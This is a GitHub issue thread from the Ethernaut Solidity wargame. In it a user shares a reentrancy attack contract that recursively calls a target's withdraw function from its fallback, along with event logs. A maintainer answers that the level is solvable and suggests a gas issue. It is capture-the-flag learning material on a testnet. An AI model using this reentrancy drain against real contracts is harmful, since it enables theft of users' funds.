### ISSUE TITLE
re-entrancy is not sending ether when calling the withdraw function

### ISSUE THREAD

**Issue by yoryos** [OpenZeppelin/ethernaut#72]
Reentrancy. As far as I can tell I must abuse the fact that withdraw sends money before decreasing the msg.sender balance.

I created the following contract to do so.
```
contract ReentrancySol {
    
    Reentrance r;
    
    function attack(address p) public payable {
        r = Reentrance(p);
        uint val = msg.value;
        emit balances(address(this).balance, address(r).balance, r.balanceOf(address(this)));
        r.donate.value(val)(address(this));
        emit balances(address(this).balance, address(r).balance, r.balanceOf(address(this)));
        r.withdraw(val);
        emit balances(address(this).balance, address(r).balance, r.balanceOf(address(this)));
    }
    
    function fin() public {
        msg.sender.transfer(address(this).balance);
    }
    
    event balances(uint this_bal, uint p_bal, uint s_bal);
    function () public payable {
        emit balances(address(this).balance, address(r).balance, msg.value);
        r.withdraw(msg.value);
    }
}
```

I couldn't reduce the balance to zero so I copy pasted the code from the example, deployed it and tested my solution against that deployment and it worked.

The two "possibly-broken" instances can be found on ropsten at addresses:

"0x5988ebddba7902a11ed1d49149beacbf1b289921"

"0xe58be13cab8d2acf0e34122be479606100710532"

From the events I included in my solution it looks like the withdraw function from the above addresses reduces the balance of the caller but never actually sends the funds.

For example my last run emitted the following events

```
[
	{
		"from": "0x067e199beae08d2142ab97e5d77b80b42d2020cc",
		"topic": "0xec1755815c979b26f7aae33a09175d2f4fa82c802354e2c2ec79d20732029c0a",
		"event": "balances",
		"args": {
			"0": "1000000000000000000",
			"1": "2000000000000000000",
			"2": "0",
			"this_bal": "1000000000000000000",
			"p_bal": "2000000000000000000",
			"s_bal": "0",
			"length": 3
		}
	},
	{
		"from": "0x067e199beae08d2142ab97e5d77b80b42d2020cc",
		"topic": "0xec1755815c979b26f7aae33a09175d2f4fa82c802354e2c2ec79d20732029c0a",
		"event": "balances",
		"args": {
			"0": "0",
			"1": "3000000000000000000",
			"2": "1000000000000000000",
			"this_bal": "0",
			"p_bal": "3000000000000000000",
			"s_bal": "1000000000000000000",
			"length": 3
		}
	},
	{
		"from": "0x067e199beae08d2142ab97e5d77b80b42d2020cc",
		"topic": "0xec1755815c979b26f7aae33a09175d2f4fa82c802354e2c2ec79d20732029c0a",
		"event": "balances",
		"args": {
			"0": "0",
			"1": "3000000000000000000",
			"2": "0",
			"this_bal": "0",
			"p_bal": "3000000000000000000",
			"s_bal": "0",
			"length": 3
		}
	}
]
```

**Comment by ajsantander** [comment]
I wouldn't call this a bug in Ethernaut, but an attempt to solve the Reentrance level that is not working for not immediately logical reasons. I mean, the logic of your approach looks good, but there must be some gas problem I imagine stopping it from working. Perhaps it has to do with the cost of emitting events and the max. gas a fallback function can spend?

The tests for the level are passing, which means that the level is solvable, so I'm closing this since it's not really an issue with the level. Yes, the level could be more "robust" but it only needs to be solvable in one way for it to qualify as a level.
